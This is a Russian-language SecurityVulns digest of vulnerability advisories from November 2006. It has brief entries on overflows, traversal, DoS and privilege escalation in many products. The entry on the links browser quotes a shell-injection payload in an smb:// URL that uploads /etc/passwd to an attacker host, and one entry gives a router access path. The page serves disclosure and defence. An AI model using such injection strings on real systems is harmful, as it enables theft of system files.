Информационная безопасность
[RU] switch to English



30 ноября 2006 г.
Подробнее
7!Многочисленные ошибки в Mac OS X (multiple bugs)
document Переполнение буфера в PPP. Обнаружение пользовательских учетных записей через ftpd. Переполннение буфера в Type Services server. Повреждение памяти через файлы .DS_Store в Finder. Обращение к освобожденным объектам в WebKit.
 Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
document Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.
  


29 ноября 2006 г.
Подробнее
6!Переполнение буфера в библиотеке Borland idsql32.dll (buffer overflow)
document Переполнение буфера в функции DbiQExec().
 Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
document Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.
  


28 ноября 2006 г.
Подробнее
9!Переполнение буфера в ProFTPD (buffer overflow)
дополнено с 10 ноября 2006 г.
document Однобайтовое переполнение буфера в sreplace() используется для получения удаленного привилегированного доступа.
6!Ошибка форматной строки в GNU Radius (format string)
document Ошибка форматной строки в sqllog() при журналировании через SQL.
 Обратный путь в каталогах класса DeploymentFileRepository JBoss Web Server (directory traversal)
document Функция setBaseDir() класса DeploymentFileRepository не проверяет, чтобы каталог был установлен внутри рабочего каталога.
 Переполнение буфера в GnuPG (buffer overflow)
document Переполнение буфера на длинном имени файла.
 Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
document Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.
 Обратный путь в каталогах tar (directory traversal)
document Проблемы при разборе устаревшей структуры GNUTYPE_NAMES позволяют создать символьные линки, ведущие за пределы директории назначения.
 Слабые разрешения в текстовых редакторах KDE Kate / Kwrite / Kile (weak permissions)
дополнено с 19 июля 2005 г.
document Резервные файлы создаются со слабыми разрешениями.
  


27 ноября 2006 г.
Подробнее
 Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
document Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.
 DoS против QBIK Windate
document Бесконечный цикл при разборе сжатых DNS-запросов.
 Переполнение буфера в TFTP-Серверах AT-TFTP / 3CTftpSvc (buffer overflow)
document Переполнение буфера в командах GET, PUT.
 Выполнение кода через pstotext (shell characters)
document Проблема шел-символов через имя обрабатываемого файла.
  


25 ноября 2006 г.
Подробнее
 Внедрение shell-символов в fvwm-menu-directory (shell characters)
document Возможно внедрение шел-символов через имена просматриваемых каталогов.
 DoS против mod_auth_kerberos в Apache
document Однобайтовое переполнение в der_get_oid().
 Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
document Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.
  


23 ноября 2006 г.
Подробнее
7!Переполнение буфера Windows Media Player (buffer overflow)
document Переполнение стека при разборе файлов .asx.
 Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
document Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.
 Перехват учетных данных в менеджере паролей Firefox (information leak)
document При автоматическом заполнении формы не учитывается ее назначение, поэтому, если атакующий может вставить форму в содержимое сайта, то он сможет получить результаты сохраненных полей (логин/пароль).
  


22 ноября 2006 г.
Подробнее
6!Переполнения буфера в XMPlay (buffer overflow)
document Переполнения буфера при разборе файлов .ASX и .M3U.
6!Переполнение буфера в CA BrightStor ARCserve Backup (buffer overflow)
document Переполнение буфера при разборе данных TCP/6502.
 Слабые разрешения в PassGo SSO Plus (weak permissions)
document Слабые разрешения на папку установки.
 Обход криптографической защиты в клиенте VMWare VirtualClient (weak cryptography)
document Не проверяется сертификат сервера при подключении по SSL.
 Повышение привилегий через My Firewall Plus (privilege escalation)
document Происходит запуск Explorer.exe с привилегиями локальной системы.
 Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
document Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.
  


20 ноября 2006 г.
Подробнее
7!Переполнение буфера в службе рабочей станции Microsoft Windows (buffer overflow)
дополнено с 14 ноября 2006 г.
document Переполнение буфера в службе, основанной на RPC.
 Однобайтовое переполнение буфера в сервере IMAP/POP3 Dovecot (buffer overflow)
   
 Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
document Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.
  


18 ноября 2006 г.
Подробнее
7!Переполнение буфера в драйвере NetGear WG111 (buffer overflow)
document Переполнение буфера при разборе Beacon-фрейма.
6!DoS против libpng
дополнено с 16 ноября 2006 г.
document Чтение за пределами выделенной памяти в png_set_sPLT().
 Выход за пределы ограниченной среды в Sun Java (protection bypass)
document Функции библиотеки Swing могут обратиться к данным других апплетов.
 Повышение привилегий через драйвер HIPS в продуктах Computer Associates (privilege escalation)
document Недостаточный контроль параметров перехваченных фуннкций TDI и NDIS.
 Переполнение буфера в TFTP-сервере TFTPD32 (buffer overflow)
document Переполнение буфера на длинном имени файла.
 DoS против WBEM в HP-UX
   
 Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
document Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.
  


17 ноября 2006 г.
Подробнее
 Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
document Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.
  


16 ноября 2006 г.
Подробнее
6!Многочисленные уязвимости в ActiveX Panda Antivirus ActiveScan (multiple bugs)
document Повреждение памяти, утечка информации, возможность перезагрузки компьютера пользователя.
 DoS против UniversalFTP
document Отказ сервера на команде MKD определенного формата.
 Обратный путь в каталогах Selenium FTP Server / Conxint FTP (directory traversal)
document Обратный путь в каталогах в различных командах.
 Слабые разрешение в MDaemon (weak permissions)
document Папка установки позволяет пользователям создание файлов, что позволяет подмены системных DLL локальными версиями.
 Повышение привилегий через Kerio Webstar (privilege escalation)
document Suid-приложение подгружает библиотеку из текущего каталога.
 Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
document Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.
 Многочисленные уязвимости в клиенте сетей Netware Microsoft Windows (multiple bugs)
дополнено с 14 ноября 2006 г.
document Повреждение памяти, DoS.
 Повышение привилегий через Outpost Firewall (privilege escalation)
дополнено с 2 ноября 2006 г.
document Недостаточная проверка данных устройства \Device\SandBox и аргументов перехваченых системных вызовов SSDT.
  


15 ноября 2006 г.
Подробнее
9!Переполнение буфера в daxctle.ocx и при разборе HTML Microsoft Windows (buffer overflow)
дополнено с 13 сентября 2006 г.
document Переполнение буфера динамической памяти в ActiveX объекте DirectAnimation.PathControl метод KeyFrame. переполнение буера в опции CSS Float. Может быть использовано для скрытой установки вредоносного кода.
6!Проблема шел-символов в links (shell characters)
document Проблема шел-символов при вызове внешней команды smbclient при обработке URL типа 'smb://attacker.net/work/XXX" YYY; lcd ..; lcd ..; lcd ..; lcd etc; put passwd ; exit; '
  


14 ноября 2006 г.
Подробнее
9!0-day выполнение кода через XMLHTTP ActiveX в Windows (code execution)
дополнено с 5 ноября 2006 г.
document Уязвимость в ActiveX используется для скрытой установки вредоносного кода.
8!Переполнение буфера в Macromedia Flash Player (buffer overflow)
дополнено с 13 сентября 2006 г.
document Переполнение динамического буфера при показе .swf файлов. Может быть использована для скрытой установки вредоносного кода через браузер.
7!Переполнение буфера в беспроводных драйверах D-Link (buffer overflow)
document Переполнение буфера при длинном поле Rates beacon-фрейма 802.11
6!Многочисленные уязвимости в PowerDNS (multiple bugs)
document Переполнение буфера и DoS.
6!Многочисленные уязвимости в Citrix Metaframe (multiple bugs)
дополнено с 9 ноября 2006 г.
document DoS и переполнение буфера в сервисе IMA (TCP/2512, TCP/2513).
 Утечка информации через SNMP в 3Com SuperStack 3 (information leak)
document Возможно получить SNMP community с помощью определенных пакетов управления.
 Криптографическая уязвимость ISAKMP в Novell BorderManager (weak cryptography)
document Слабый алгоритм генерации Cookie позволяет replay-атаки.
 Переполнение буфера в GraphicsMagick (buffer overflow)
document Переполнения буфера при разборе форматов PALM и DCM.
 Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
document Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.
 Многочисленные уязвимости в VMWare ESX Server (multiple bugs)
document Некорректная работа с командами fxsave/restore на процессорах AMD. Ошибки во включенном ПО.
 Слабое шифрование в токенах Digipass Go3 (weak encryption)
document Используется ослабленная реализация алгоритма 3DES.
  


13 ноября 2006 г.
Подробнее
7!Переполнение буфера в беспроводных драйверах Broadcom (buffer overflow)
document Переполнение буфера на длинном SSID.
6!Многочисленные уязвимости в антивирусе AVG (multiple bugs)
document Переполнения динамической памяти при разборе архивов CAB и RAR, целочисленное переполнение при разборе EXE.
 Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
document Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.
  


11 ноября 2006 г.
Подробнее
 DoS через fpathfconf() в Mac OS X
document Вызов fpathconf() для неподдерживаемого типа файлов приводит к краху системы.
 Повышение привилегий в Avahi (privilege escalation)
document Недостаточная проверка сообщений Netlink дает локальному пользователю возможность манипуляции параметрами сервера.
 DoS против OpenLDAP
document Определенные параметры bind-запроса приводят к отказу сервера.
 Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
document Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.
  


10 ноября 2006 г.
Подробнее
6!Выполнение кода через HP OpenView Client Configuration Manager (code execution)
дополнено с 9 ноября 2006 г.
document Через порт TCP/3465 возможно дать команду на загрузку и выполнение файла без аутентификации.
 Обратный путь в каталогах MailMarshal (directory traversal)
document Обратный путь в каталогах при разборе архивов ARJ.
 Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
document Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.
 Обход защиты в Netkit FTP Server (protection bypass)
document Некорректное использование seteuid() и chroot() позволяют в определенных конфигурациях выход за пределы корневого каталога сервера.
 Переполнение буфера в библиотеке libpthread под HP Tru64 Unix (buffer overflow)
document Переполнение буфера при разборе переменной окружения PTHREAD_CONFIG.
  


9 ноября 2006 г.
Подробнее
6!Многочисленные уязвимости в Cisco Secure Desktop (multiple bugs)
document Слабые разрешения NTFS на папку установки. Обход защиты. Утечка информации.
 Переполнение буфера в GNU gv (buffer overflow)
document Переполнение буфера стековой памяти на длинных комментариях в файлах PostScript.
 Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
document Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.
 DoS против библиотеки libarchive
document Конец архива, полученный в момент пропуска области приводит к вечному циклу.
  


8 ноября 2006 г.
Подробнее
8!Многочисленные уязвимости в Mozilla Firefox / Thunderbird / Seamonkey (multiple bugs)
document Повреждения памяти, подмена кода, выполнение кода. Могут быть использованы для скрытой установки вредоносного кода.
6!Обход фильтрации IPv6 ядра Linux (protection bypass)
document Возможно обойти фильтрацию, используя фрагментированные пакеты.
6!Утечка информации в Lotus Notes (information leak)
document Через порт TCP/1352 возможно проверить существование пользователя и для нового пользователя загрузить его сертификат.
6!Повышение привилегий через Xcode OpenBase SQL в Apple MacOS X (privilege escalation)
дополнено с 16 октября 2006 г.
document При вызове tar из suid root приложения не сбрасывается переменная окружения TAR_OPTIONS, что позволяет выполнить любоеприложения с привилегиями root. Внешние приложения вызываются по относительному пути. Динамические библиотеки подгружаются по относительному пути. Проблема символьных линков.
 Переполнение буфера в NFS-сервере OmniNFS (buffer overflow)
   
 Переполнения буфера в tunekrnl Lotus Domino (buffer overflow)
document Многочисленные переполнения буфера в suid-утилите.
 Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
document Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.
  


7 ноября 2006 г.
Подробнее
6!Ошибка форматной строки в WarFTPd (format string)
document Ошибка форматной строки в команде CWD.
6!Переполнение буфера в WFTPD Pro (buffer overflow)
document Переполнение буфера команде APPE.
 Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
document Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.
  


6 ноября 2006 г.
Подробнее
10!Выполнение кода через ICQ (code execution)
document Небезопасная функция элемента управления ICQPhone.SipxPhoneManager позволяет загрузить и выполнить код через сообщение ICQ или Web-страницу.
6!Повышение привилегий через структуры GDI ядра Windows (privilege escalation)
document Разделяемую секцию памяти, отображенную в режиме только чтения, возможно отобразить в режиме записи.
 Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
document Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.
  


5 ноября 2006 г.
Подробнее
7!Криптографические уязвимости в OpenSSL (weak cryptography)
дополнено с 5 сентября 2006 г.
document При использовании ключа RSA с экспонентой 3 в формате PKCS #1 v1.5 можно подделать подпись этого ключа.
6!Многочисленные уязвимости в imlib (multiple bugs)
document Многочисленные уязвимости при разборе форматов ARGB, JPG, LBM, PNG, PNM, TGA и TIFF.
6!Переполненеи буфера в Novell NetMail (buffer overflow)
document Переполнение буфера при разборе имени пользователя, содержащем точку.
 DoS против XM Easy Personal FTP Server
document Отказ на длинном аргументе команды NLST -al.
 Переполнение буфера в Essentia Web Server (buffer overflow)
document Переполнение буфера на длинном GET-запросе.
 Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
document Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.
 Проблема символьных линков в thttpd (symbolic links)
document Небезопасное создание временных файлов при ротации лог-файлов.
  


3 ноября 2006 г.
Подробнее
8!Переполнение буфера в функциях PHP (buffer overflow)
document Переполнения буфера в функциях htmlentities() и htmlspecialchars() при использовании UTF-8.
 Двойной free() в модуле squashfs ядра Linux
   
 Многочисленные ошибки в HP System Management Homepage (multiple bugs)
document Межсайтовый скриптинг, обход защиты.
 Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
document Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.
 Переполнение буфера в клиенте iodine (buffer overflow)
document Переполнение буфера при разборе ответа cервера DNS.
 Проблема шел-символов в ingo1 (shell characters)
document Недостаточная фильтрация шел-символов при создании правил procmail дает возможность выполнения кода.
 Обход защиты в pam_ldap (protection bypass)
document Возможно войти в систему с отключенной учетной записью.
 Переполнение буфера в графических драйверах Nvidia для Linux / Solaris (buffer overflow)
дополнено с 19 октября 2006 г.
document Целочисленное переполнение в _nv000053X приводит к переполнению буфера.
  


2 ноября 2006 г.
Подробнее
7!Переполнение буфера в драйвере Apple Airport под Mac OS X (memory corruption)
document Повреждение памяти при разборе фрейма probe response.
6!Многочисленные уязвимости в SAP Web Application Server (multiple bugs)
document Локальное повышение привилегий через именованные каналы, обратный путь в каталогах, DoS.
 Повышение привилегий в HP-UX (privilege escalation)
   
 DoS против ядра Linux
document Бесконечный цикл в /proc/net/ip6_flowlabel.
 Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
document Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.
 Многочисленные DoS-условия в wireshark
document DoS-условия при разборе различных протоколов.
 Обход аутентификации в Cisco Security Agent Management Center (authentication bypass)
document При использовании LDAP для аутентификации возможен доступ с пустым паролем.
  


1 ноября 2006 г.
Подробнее
 Многочисленные уязвимости в Asterisk (multiple bugs)
document Определенные последовательности пакетов приводят к отказу сервера.
 DoS против Novell eDirectory
document Крах службы при некорректном запросе на вход.
 DoS против Novell iManager
document Запрос HTTP POST с длинным параметром TREE приводит к ссылке по нулевому указателю.
 Несанкционированный доступ к беспроводным маршрутизаторам B-FOCuS Wireless (unauthorized access)
document С помощью URL типа http://target/html/defs/ можно получить доступ к служебной информации маршрутизатора.
 Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
document Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.
 Несанкционированный доступ через ActiveX BlooMooWeb (unauthorized access)
document Элемент управления содержит небезопасные функции.
 Неизменяемый адрес DNS в беспроводных маршрутизаторах Hawking Technology WR254-CA
document Используется неизменяемый адрес DNS 139.175.55.244.
  

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород